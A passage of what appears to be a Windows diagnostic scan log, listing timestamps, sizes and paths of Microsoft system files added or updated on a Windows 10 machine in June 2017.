2017-06-14 20:30 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe
2017-06-14 20:30 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-06-14 20:30 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-06-14 20:30 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-06-14 20:30 - 2017-06-03 11:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-06-14 20:30 - 2017-06-03 11:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-06-14 20:30 - 2017-06-03 11:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 11:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-06-14 20:30 - 2017-06-03 10:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-06-14 20:30 - 2017-06-03 10:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-06-14 20:30 - 2017-06-03 10:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 10:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe
2017-06-14 20:30 - 2017-06-03 10:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe
2017-06-12 21:56 - 2017-06-14 20:22 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-06-12 21:55 - 2017-06-12 21:55 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-06-12 21:54 - 2017-06-12 21:54 - 00000020 ___SH C:\Users\ararat\ntuser.ini
2017-06-08 09:54 - 2017-06-08 09:54 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
